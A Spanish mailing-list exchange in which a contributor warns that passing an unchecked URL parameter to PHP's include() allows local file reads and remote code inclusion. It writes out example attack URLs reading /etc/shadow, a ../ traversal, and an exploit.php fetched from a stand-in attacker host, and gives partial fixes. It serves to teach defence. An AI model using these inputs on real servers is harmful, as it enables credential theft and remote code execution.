Si, es cierto, lo importante era la idea nada más.

Saludos, Pablo

On 10/17/06, carlos campderrós <[EMAIL PROTECTED]> wrote:
>
> CUIDADÍN!!! imaginate esta dirección:
> http://tu-servidor.com/index.php?url=/etc/shadow o
>
> http://tu-servidor.com/index.php?url=http://sitio-de-script-kiddies.com/exploit.php
> .
>
> En el primer caso un atacante malicioso podría acceder a cualquier
> archivo del servidor (bueno, puntualizando, a cualquier archivo al que
> el usuario con el que el servidor web se ejecuta tenga acceso) y en el
> segundo, pueden ejecutar el código php que quieran en tu servidor (por
> ejemplo, descargar algun programa en /tmp y ejecutarlo (con los mismos
> permisos que se ejecuta el servidor web)).
>
> soluciones:
>   para ambos casos: include("pag_".$_GET['url'].".php");
>   (algo como include("./".$_GET['url']); no funcionaria para el
> segundo caso:
> http://tu-servidor.com/index.php?url=../../../../../../../../etc/shadow
> )
>
>   sólo para el segundo caso (aunque siempre aconsejable): desactivar
> fopen_wrappers (o algo así) en php.ini (y reiniciar el servidor web).
>
_______________________________________________
Lista de distribución Ovillo
Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org
Puedes modificar tus datos o desuscribirte en la siguiente dirección: 
http://lists.ovillo.org/mailman/listinfo/ovillo

Responder a